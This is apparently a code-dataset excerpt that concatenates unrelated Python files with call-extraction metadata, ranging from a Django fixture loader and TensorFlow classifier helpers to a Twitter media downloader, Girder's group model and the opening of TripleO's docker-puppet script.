from django.conf import settings from django.core.management import call_command from django.core.management.base import BaseCommand from os import path class Command(BaseCommand): help = "Populates data" def handle(self, *args, **options): fixture_path = path.join(path.dirname( path.dirname( path.dirname( path.abspath(__file__) ) ) ), "fixtures/") settings.FIXTURE_DIRS = (fixture_path,) call_command("loaddata", "country", verbosity=1)
[((19, 8, 19, 56), 'django.core.management.call_command', 'call_command', (), '', False, 'from django.core.management import call_command\n'), ((14, 20, 14, 42), 'os.path.abspath', 'path.abspath', ({(14, 33, 14, 41): '__file__'}, {}), '(__file__)', False, 'from os import path\n')]
chrisiacovella/gmso
gmso/formats/formats_registry.py
c78e2425ccb98ea952f024a569346d36045f6918
"""Registry utilities to handle formats for gmso Topology.""" class UnsupportedFileFormatError(Exception): """Exception to be raised whenever the file loading or saving is not supported.""" class Registry: """A registry to incorporate a callable with a file extension.""" def __init__(self): self.handlers = {} def _assert_can_process(self, extension): if extension not in self.handlers: raise UnsupportedFileFormatError( f"Extension {extension} cannot be processed as no utility " f"is defined in the current API to handle {extension} files." ) def get_callable(self, extension): """Get the callable associated with extension.""" self._assert_can_process(extension) return self.handlers[extension] SaversRegistry = Registry() LoadersRegistry = Registry() class saves_as: """Decorator to aid saving.""" def __init__(self, *extensions): extension_set = set(extensions) self.extensions = extension_set def __call__(self, method): """Register the method as saver for an extension.""" for ext in self.extensions: SaversRegistry.handlers[ext] = method return method class loads_as: """Decorator to aid loading.""" def __init__(self, *extensions): extension_set = set(extensions) self.extensions = extension_set def __call__(self, method): """Register the method as loader for an extension.""" for ext in self.extensions: LoadersRegistry.handlers[ext] = method return method
[]
Staist/Python-Text-Formatter
formatter.py
6ae865d45301906eaa133551301dc785602f5b38
dosyaadi = input("Enter file name: ") dosyaadi = str(dosyaadi + ".txt") with open(dosyaadi, 'r') as file : dosyaicerigi = file.read() silinecek = str(input("Enter the text that you wish to delete: ")) dosyaicerigi = dosyaicerigi.replace(silinecek, '') with open(dosyaadi, 'w') as file: file.write(dosyaicerigi) file.close() print("-" * 30) print("Successfully deleted!") print("-" * 30)
[]
salvacarrion/mltests
covid19/classification/helpers.py
e4ac9711c1c80171f302edc88011fbe06e754490
import tensorflow as tf @tf.function def BinaryAccuracy_Infiltrates(y_true, y_pred, i=0): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) @tf.function def BinaryAccuracy_Pneumonia(y_true, y_pred, i=1): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) @tf.function def BinaryAccuracy_Covid19(y_true, y_pred, i=2): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) @tf.function def BinaryAccuracy_Normal(y_true, y_pred, i=3): return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i]) class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.wait_epoch_warmup = kwargs.get("wait_epoch_warmup") def on_epoch_end(self, epoch, logs=None): if self.wait_epoch_warmup: if (epoch + 1) >= self.wait_epoch_warmup: super().on_epoch_end(epoch, logs) else: self.epochs_since_last_save += 1 print(f"Skipping save model (wait_epoch_warmup={self.wait_epoch_warmup - (epoch + 1)})") else: super().on_epoch_end(epoch, logs) class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping): def __init__(self, *args, **kwargs): self.minimum_epochs = kwargs.get("minimum_epochs", 0) kwargs.pop('minimum_epochs', None) # Problems with EarlyStopping kwargs super().__init__(*args, **kwargs) def on_epoch_end(self, epoch, logs=None): if epoch >= self.minimum_epochs: super().on_epoch_end(epoch, logs) def get_losses(): losses = [tf.keras.losses.BinaryCrossentropy()] return losses def get_metrics(single_output_idx, add_normal=False): metrics = [] if single_output_idx is None: # Multi-label print("###### Multi-label classification ######") metrics += [ BinaryAccuracy_Infiltrates, BinaryAccuracy_Pneumonia, BinaryAccuracy_Covid19 ] # Add normal class if add_normal: metrics.append(BinaryAccuracy_Normal) else: print(f"###### Multi-class classification (cls: '{single_output_idx}') ######") metrics = [ tf.keras.metrics.BinaryAccuracy(), tf.keras.metrics.AUC(), tf.keras.metrics.Precision(), tf.keras.metrics.Recall() ] return metrics def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None): istrainable = not freeze_base_model # Select backbone if backbone == "resnet50": from tensorflow.keras.applications.resnet import ResNet50 as TFModel from tensorflow.keras.applications.resnet import preprocess_input elif backbone == "resnet50v2": from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel from tensorflow.keras.applications.resnet_v2 import preprocess_input elif backbone == "resnet101v2": from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel from tensorflow.keras.applications.resnet_v2 import preprocess_input elif backbone == "vgg16": from tensorflow.keras.applications.vgg16 import VGG16 as TFModel from tensorflow.keras.applications.vgg16 import preprocess_input elif backbone == "efficientnetb0": from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel from tensorflow.keras.applications.efficientnet import preprocess_input elif backbone == "efficientnetb7": from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel from tensorflow.keras.applications.efficientnet import preprocess_input else: raise ValueError(f"Unknown backbone: {backbone}") if ignore_model: model = None else: # Instantiate base model with pre-trained weights base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet") # Freeze base model # base_model.trainable = istrainable for layers in base_model.layers: layers.trainable = istrainable # Create a new model on top inputs = base_model.input x = base_model(inputs) # Option A x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x) # Option B # x = tf.keras.layers.Flatten(name='flatten')(x) # x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x) # x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x) # Outputs outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x) model = tf.keras.Model(inputs, outputs) return model, preprocess_input def add_tabular_input(model, classes): # Input1 input1 = model.input input2 = tf.keras.layers.Input(shape=(2,), name="input_2b") # Pre-outputs 1x3 + 1x3 output1 = model.output output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2) # Outputs x = tf.keras.layers.Concatenate(axis=1)([output1, output2]) output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x) model = tf.keras.Model([input1, input2], output) return model def unfreeze_base_model(model, n=None, unfreeze=True): base_model = model.layers[1].layers # Select number of layers to unfreeze idx = 0 if n is not None: if isinstance(n, int): idx = n print(f"Unfreezing {len(base_model) - idx} layers") elif isinstance(n, float) and 0.0 < n <= 1.0: idx = int(len(base_model) * n) print(f"Unfreezing {idx} layers") else: raise ValueError("Invalid number of layers") # We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights) for layer in base_model[-idx:]: if not isinstance(layer, tf.keras.layers.BatchNormalization): layer.trainable = True
[((6, 11, 6, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(6, 44, 6, 56): 'y_true[:, (i)]', (6, 58, 6, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((11, 11, 11, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(11, 44, 11, 56): 'y_true[:, (i)]', (11, 58, 11, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((16, 11, 16, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(16, 44, 16, 56): 'y_true[:, (i)]', (16, 58, 16, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((21, 11, 21, 71), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', ({(21, 44, 21, 56): 'y_true[:, (i)]', (21, 58, 21, 70): 'y_pred[:, (i)]'}, {}), '(y_true[:, (i)], y_pred[:, (i)])', True, 'import tensorflow as tf\n'), ((139, 13, 139, 63), 'tensorflow.keras.layers.Input', 'tf.keras.layers.Input', (), '', True, 'import tensorflow as tf\n'), ((148, 12, 148, 52), 'tensorflow.keras.Model', 'tf.keras.Model', ({(148, 27, 148, 43): '[input1, input2]', (148, 45, 148, 51): 'output'}, {}), '([input1, input2], output)', True, 'import tensorflow as tf\n'), ((53, 14, 53, 50), 'tensorflow.keras.losses.BinaryCrossentropy', 'tf.keras.losses.BinaryCrossentropy', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((110, 21, 110, 98), 'tensorflow.keras.applications.efficientnet.EfficientNetB7', 'TFModel', (), '', True, 'from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel\n'), ((131, 16, 131, 47), 'tensorflow.keras.Model', 'tf.keras.Model', ({(131, 31, 131, 37): 'inputs', (131, 39, 131, 46): 'outputs'}, {}), '(inputs, outputs)', True, 'import tensorflow as tf\n'), ((143, 14, 143, 85), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (), '', True, 'import tensorflow as tf\n'), ((146, 8, 146, 43), 'tensorflow.keras.layers.Concatenate', 'tf.keras.layers.Concatenate', (), '', True, 'import tensorflow as tf\n'), ((147, 13, 147, 91), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (), '', True, 'import tensorflow as tf\n'), ((73, 12, 73, 45), 'tensorflow.keras.metrics.BinaryAccuracy', 'tf.keras.metrics.BinaryAccuracy', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((74, 12, 74, 34), 'tensorflow.keras.metrics.AUC', 'tf.keras.metrics.AUC', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((75, 12, 75, 40), 'tensorflow.keras.metrics.Precision', 'tf.keras.metrics.Precision', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((76, 12, 76, 37), 'tensorflow.keras.metrics.Recall', 'tf.keras.metrics.Recall', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((122, 12, 122, 67), 'tensorflow.keras.layers.GlobalAveragePooling2D', 'tf.keras.layers.GlobalAveragePooling2D', (), '', True, 'import tensorflow as tf\n'), ((130, 18, 130, 90), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (), '', True, 'import tensorflow as tf\n')]
mikoim/funstuff
null/twitter/twmedia-dl.py
3c391c76784a4bb37983c1a251773bfa61182ce1
import re import json import time import sys import httplib2 from twitter import * import magic class TwitterMediaDL: http = httplib2.Http(".cache") baseUrl = "https://twitter.com" consumer_key = "" consumer_secret = "" access_token_key = "" access_token_secret = "" t = Twitter(auth=OAuth(access_token_key, access_token_secret, consumer_key, consumer_secret)) remaining = None def http_wrapper(self, uri): resp, content = self.http.request( uri=uri, method='GET' ) return content def get_medias(self, nickname): ids = [] for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)", self.http_wrapper(self.baseUrl + '/%s/media' % nickname).decode()): ids.append(int(tweet[1])) max_id = ids[len(ids) - 1] while 1: res_raw = self.http_wrapper( self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % ( nickname, max_id)).decode() try: res = json.loads(res_raw) except: print(res_raw) time.sleep(5) res_raw = self.http_wrapper( self.baseUrl + '/i/profiles/show/%s/media_timeline?include_available_features=1&include_entities=1&max_id=%d' % ( nickname, max_id)).decode() res = json.loads(res_raw) if not res['has_more_items']: break for tweet in re.findall("twitter.com/(.+)/status/([0-9]+)", res['items_html']): ids.append(int(tweet[1])) max_id = int(res['max_id']) return list(set(ids)) def get_image_url(self, tweet_id): lst = [] if self.remaining is None or self.remaining % 10 is 0 or self.remaining <= 1: self.check_limit() r = self.t.statuses.show(_id=tweet_id, _method='GET') self.remaining -= 1 print('{:d}\t{:d}\t{:s}'.format(tweet_id, self.get_unix_epoch(r['created_at']), r['text'])) for m in r['entities']['media']: lst.append(m['media_url'] + ':orig') return lst def check_limit(self): r = self.t.application.rate_limit_status(_method='GET')['resources']['statuses']['/statuses/show/:id'] self.remaining = r['remaining'] print("API Limit : {:d} / {:d} = {:f}".format(r['remaining'], r['limit'], r['remaining'] / r['limit']), file=sys.stderr) if r['remaining'] / r['limit'] < 0.10: reset = r['reset'] - time.time() print("Please wait... {:f}".format(reset), file=sys.stderr) time.sleep(reset + 10) @staticmethod def get_file_extension(binary): mime = magic.from_buffer(binary, True).decode() return mime.split('/')[1] @staticmethod def get_unix_epoch(created_at): return int(time.mktime(time.strptime(created_at, "%a %b %d %H:%M:%S +0000 %Y"))) if __name__ == '__main__': for i in range(1, len(sys.argv)): tw = TwitterMediaDL() for tweetID in tw.get_medias(sys.argv[i]): list_url = tw.get_image_url(tweetID) for j in range(0, len(list_url)): raw = tw.http_wrapper(list_url[j]) ext = tw.get_file_extension(raw) with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f: f.write(raw)
[((12, 11, 12, 34), 'httplib2.Http', 'httplib2.Http', ({(12, 25, 12, 33): '""".cache"""'}, {}), "('.cache')", False, 'import httplib2\n'), ((57, 25, 57, 90), 're.findall', 're.findall', ({(57, 36, 57, 70): '"""twitter.com/(.+)/status/([0-9]+)"""', (57, 72, 57, 89): "res['items_html']"}, {}), "('twitter.com/(.+)/status/([0-9]+)', res['items_html'])", False, 'import re\n'), ((90, 12, 90, 34), 'time.sleep', 'time.sleep', ({(90, 23, 90, 33): '(reset + 10)'}, {}), '(reset + 10)', False, 'import time\n'), ((45, 22, 45, 41), 'json.loads', 'json.loads', ({(45, 33, 45, 40): 'res_raw'}, {}), '(res_raw)', False, 'import json\n'), ((88, 33, 88, 44), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((94, 15, 94, 46), 'magic.from_buffer', 'magic.from_buffer', ({(94, 33, 94, 39): 'binary', (94, 41, 94, 45): 'True'}, {}), '(binary, True)', False, 'import magic\n'), ((99, 31, 99, 86), 'time.strptime', 'time.strptime', ({(99, 45, 99, 55): 'created_at', (99, 57, 99, 85): '"""%a %b %d %H:%M:%S +0000 %Y"""'}, {}), "(created_at, '%a %b %d %H:%M:%S +0000 %Y')", False, 'import time\n'), ((48, 16, 48, 29), 'time.sleep', 'time.sleep', ({(48, 27, 48, 28): '(5)'}, {}), '(5)', False, 'import time\n'), ((52, 22, 52, 41), 'json.loads', 'json.loads', ({(52, 33, 52, 40): 'res_raw'}, {}), '(res_raw)', False, 'import json\n')]
DEVESHTARASIA/tensorflow
tensorflow/contrib/metrics/__init__.py
d3edb8c60ed4fd831d62833ed22f5c23486c561c
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Ops for evaluation metrics and summary statistics. See the @{$python/contrib.metrics} guide. @@streaming_accuracy @@streaming_mean @@streaming_recall @@streaming_recall_at_thresholds @@streaming_precision @@streaming_precision_at_thresholds @@streaming_auc @@streaming_curve_points @@streaming_recall_at_k @@streaming_mean_absolute_error @@streaming_mean_iou @@streaming_mean_relative_error @@streaming_mean_squared_error @@streaming_mean_tensor @@streaming_root_mean_squared_error @@streaming_covariance @@streaming_pearson_correlation @@streaming_mean_cosine_distance @@streaming_percentage_less @@streaming_sensitivity_at_specificity @@streaming_sparse_average_precision_at_k @@streaming_sparse_average_precision_at_top_k @@streaming_sparse_precision_at_k @@streaming_sparse_precision_at_top_k @@streaming_sparse_recall_at_k @@streaming_specificity_at_sensitivity @@streaming_concat @@streaming_false_negatives @@streaming_false_negatives_at_thresholds @@streaming_false_positives @@streaming_false_positives_at_thresholds @@streaming_true_negatives @@streaming_true_negatives_at_thresholds @@streaming_true_positives @@streaming_true_positives_at_thresholds @@auc_using_histogram @@accuracy @@aggregate_metrics @@aggregate_metric_map @@confusion_matrix @@set_difference @@set_intersection @@set_size @@set_union """ from __future__ import absolute_import from __future__ import division from __future__ import print_function # pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import from tensorflow.contrib.metrics.python.metrics import * # pylint: enable=wildcard-import from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds from tensorflow.contrib.metrics.python.ops.set_ops import set_difference from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection from tensorflow.contrib.metrics.python.ops.set_ops import set_size from tensorflow.contrib.metrics.python.ops.set_ops import set_union # pylint: enable=unused-import,line-too-long from tensorflow.python.util.all_util import remove_undocumented remove_undocumented(__name__)
[((118, 0, 118, 29), 'tensorflow.python.util.all_util.remove_undocumented', 'remove_undocumented', ({(118, 20, 118, 28): '__name__'}, {}), '(__name__)', False, 'from tensorflow.python.util.all_util import remove_undocumented\n')]
scottwittenburg/girder
girder/models/group.py
a5062badc97bf2a87a385648f2ff3f9ff1990a75
#!/usr/bin/env python # -*- coding: utf-8 -*- ############################################################################### # Copyright 2013 Kitware Inc. # # Licensed under the Apache License, Version 2.0 ( the "License" ); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### import datetime from .model_base import AccessControlledModel,\ ValidationException,\ AccessException from girder.constants import AccessType class Group(AccessControlledModel): """ Groups are simply groups of users. The primary use of grouping users is to simplify access control for resources in the system, but they can be used for other purposes that require groupings of users as well. Group membership is stored in the database on the user document only; there is no "users" field in this model. This is to optimize for the most common use case for querying membership, which involves checking access control policies, which is always done relative to a specific user. The task of querying all members within a group is much less common and typically only performed ona single group at a time, so doing a find on the indexed group list in the user collection is sufficiently fast. Users with READ access on the group can see the group and its members. Users with WRITE access on the group can add and remove members and change the name or description. Users with ADMIN access can delete the entire group. """ def initialize(self): self.name = 'group' self.ensureIndices(['lowerName']) self.ensureTextIndex({ 'name': 10, 'description': 1 }) def validate(self, doc): doc['name'] = doc['name'].strip() doc['lowerName'] = doc['name'].lower() doc['description'] = doc['description'].strip() if not doc['name']: raise ValidationException('Group name must not be empty.', 'name') q = { 'lowerName': doc['lowerName'], } if '_id' in doc: q['_id'] = {'$ne': doc['_id']} duplicates = self.find(q, limit=1, fields=['_id']) if duplicates.count() != 0: raise ValidationException('A group with that name already' 'exists.', 'name') return doc def list(self, user=None, limit=50, offset=0, sort=None): """ Search for groups or simply list all visible groups. :param text: Pass this to perform a text search of all groups. :param user: The user to search as. :param limit: Result set size limit. :param offset: Offset into the results. :param sort: The sort direction. """ # Perform the find; we'll do access-based filtering of the result # set afterward. cursor = self.find({}, limit=0, sort=sort) for r in self.filterResultsByPermission(cursor=cursor, user=user, level=AccessType.READ, limit=limit, offset=offset): yield r def remove(self, group): """ Delete a group, and all references to it in the database. :param group: The group document to delete. :type group: dict """ # Remove references to this group from user group membership lists self.model('user').update({ 'groups': group['_id'] }, { '$pull': {'groups': group['_id']} }) acQuery = { 'access.groups.id': group['_id'] } acUpdate = { '$pull': { 'access.groups': {'id': group['_id']} } } # Remove references to this group from access-controlled collections. self.update(acQuery, acUpdate) self.model('collection').update(acQuery, acUpdate) self.model('folder').update(acQuery, acUpdate) self.model('user').update(acQuery, acUpdate) # Finally, delete the document itself AccessControlledModel.remove(self, group) def getMembers(self, group, offset=0, limit=50, sort=None): """ Return the list of all users who belong to this group. :param group: The group to list members on. :param offset: Offset into the result set of users. :param limit: Result set size limit. :param sort: Sort parameter for the find query. :returns: List of user documents. """ q = { 'groups': group['_id'] } cursor = self.model('user').find( q, offset=offset, limit=limit, sort=sort) users = [] for user in cursor: users.append(user) return users def addUser(self, group, user, level=AccessType.READ): """ Add the user to the group. Records membership in the group in the user document, and also grants the specified access level on the group itself to the user. Any group member has at least read access on the group. """ if not 'groups' in user: user['groups'] = [] if not group['_id'] in user['groups']: user['groups'].append(group['_id']) self.model('user').save(user, validate=False) self.setUserAccess(group, user, level, save=True) return group def joinGroup(self, group, user): """ Call this when the user accepts an invitation. """ if not 'groupInvites' in user: user['groupInvites'] = [] for invite in user['groupInvites']: if invite['groupId'] == group['_id']: self.addUser(group, user, level=invite['level']) user['groupInvites'].remove(invite) self.model('user').save(user, validate=False) break else: raise AccessException('User was not invited to this group.') return group def inviteUser(self, group, user, level=AccessType.READ): """ Invite a user to join the group. Inviting them automatically grants the user read access to the group so that they can see it. Once they accept the invitation, they will be given the specified level of access. """ # User has to be able to see the group to join it self.setUserAccess(group, user, AccessType.READ, save=True) if group['_id'] in user.get('groups', []): raise ValidationException('User is already in this group.') if not 'groupInvites' in user: user['groupInvites'] = [] for invite in user['groupInvites']: if invite['groupId'] == group['_id']: invite['level'] = level break else: user['groupInvites'].append({ 'groupId': group['_id'], 'level': level }) return self.model('user').save(user, validate=False) def removeUser(self, group, user): """ Remove the user from the group. """ # Remove group membership for this user. if 'groups' in user and group['_id'] in user['groups']: user['groups'].remove(group['_id']) self.model('user').save(user, validate=False) # Remove all group access for this user on this group. self.setUserAccess(group, user, level=None, save=True) return group def createGroup(self, name, creator, description='', public=True): """ Create a new group. The creator will be given admin access to it. :param name: The name of the folder. :type name: str :param description: Description for the folder. :type description: str :param public: Whether the group is publicly visible. :type public: bool :param creator: User document representing the creator of the group. :type creator: dict :returns: The group document that was created. """ assert type(public) is bool now = datetime.datetime.now() group = { 'name': name, 'description': description, 'created': now, 'updated': now } self.setPublic(group, public=public) # Now validate and save the group self.save(group) # We make the creator a member of this group and also grant them # admin access over the group. self.addUser(group, creator, level=AccessType.ADMIN) return group
[((243, 14, 243, 37), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n')]
mail2nsrajesh/tripleo-heat-templates
docker/docker-puppet.py
368b3eadda577f9914d181893df2df96367e8fad
#!/usr/bin/env python # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # Shell script tool to run puppet inside of the given docker container image. # Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON # array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings # that can be used to generate config files or run ad-hoc puppet modules # inside of a container. import glob import json import logging import os import sys import subprocess import sys import tempfile import multiprocessing log = logging.getLogger() ch = logging.StreamHandler(sys.stdout) if os.environ.get('DEBUG', False): log.setLevel(logging.DEBUG) ch.setLevel(logging.DEBUG) else: log.setLevel(logging.INFO) ch.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s') ch.setFormatter(formatter) log.addHandler(ch) # this is to match what we do in deployed-server def short_hostname(): subproc = subprocess.Popen(['hostname', '-s'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() return cmd_stdout.rstrip() def pull_image(name): log.info('Pulling image: %s' % name) subproc = subprocess.Popen(['/usr/bin/docker', 'pull', name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr: log.debug(cmd_stderr) def match_config_volume(prefix, config): # Match the mounted config volume - we can't just use the # key as e.g "novacomute" consumes config-data/nova volumes = config.get('volumes', []) config_volume=None for v in volumes: if v.startswith(prefix): config_volume = os.path.relpath( v.split(":")[0], prefix).split("/")[0] break return config_volume def get_config_hash(prefix, config_volume): hashfile = os.path.join(prefix, "%s.md5sum" % config_volume) hash_data = None if os.path.isfile(hashfile): with open(hashfile) as f: hash_data = f.read().rstrip() return hash_data def rm_container(name): if os.environ.get('SHOW_DIFF', None): log.info('Diffing container: %s' % name) subproc = subprocess.Popen(['/usr/bin/docker', 'diff', name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr: log.debug(cmd_stderr) log.info('Removing container: %s' % name) subproc = subprocess.Popen(['/usr/bin/docker', 'rm', name], stdout=subprocess.PIPE, stderr=subprocess.PIPE) cmd_stdout, cmd_stderr = subproc.communicate() if cmd_stdout: log.debug(cmd_stdout) if cmd_stderr and \ cmd_stderr != 'Error response from daemon: ' \ 'No such container: {}\n'.format(name): log.debug(cmd_stderr) process_count = int(os.environ.get('PROCESS_COUNT', multiprocessing.cpu_count())) log.info('Running docker-puppet') config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json') log.debug('CONFIG: %s' % config_file) with open(config_file) as f: json_data = json.load(f) # To save time we support configuring 'shared' services at the same # time. For example configuring all of the heat services # in a single container pass makes sense and will save some time. # To support this we merge shared settings together here. # # We key off of config_volume as this should be the same for a # given group of services. We are also now specifying the container # in which the services should be configured. This should match # in all instances where the volume name is also the same. configs = {} for service in (json_data or []): if service is None: continue if isinstance(service, dict): service = [ service.get('config_volume'), service.get('puppet_tags'), service.get('step_config'), service.get('config_image'), service.get('volumes', []), ] config_volume = service[0] or '' puppet_tags = service[1] or '' manifest = service[2] or '' config_image = service[3] or '' volumes = service[4] if len(service) > 4 else [] if not manifest or not config_image: continue log.info('config_volume %s' % config_volume) log.info('puppet_tags %s' % puppet_tags) log.info('manifest %s' % manifest) log.info('config_image %s' % config_image) log.info('volumes %s' % volumes) # We key off of config volume for all configs. if config_volume in configs: # Append puppet tags and manifest. log.info("Existing service, appending puppet tags and manifest") if puppet_tags: configs[config_volume][1] = '%s,%s' % (configs[config_volume][1], puppet_tags) if manifest: configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2], manifest) if configs[config_volume][3] != config_image: log.warn("Config containers do not match even though" " shared volumes are the same!") else: log.info("Adding new service") configs[config_volume] = service log.info('Service compilation completed.') def mp_puppet_config((config_volume, puppet_tags, manifest, config_image, volumes)): log.debug('config_volume %s' % config_volume) log.debug('puppet_tags %s' % puppet_tags) log.debug('manifest %s' % manifest) log.debug('config_image %s' % config_image) log.debug('volumes %s' % volumes) sh_script = '/var/lib/docker-puppet/docker-puppet.sh' with open(sh_script, 'w') as script_file: os.chmod(script_file.name, 0755) script_file.write("""#!/bin/bash set -ex mkdir -p /etc/puppet cp -a /tmp/puppet-etc/* /etc/puppet rm -Rf /etc/puppet/ssl # not in use and causes permission errors echo "{\\"step\\": $STEP}" > /etc/puppet/hieradata/docker.json TAGS="" if [ -n "$PUPPET_TAGS" ]; then TAGS="--tags \"$PUPPET_TAGS\"" fi # workaround LP1696283 mkdir -p /etc/ssh touch /etc/ssh/ssh_known_hosts 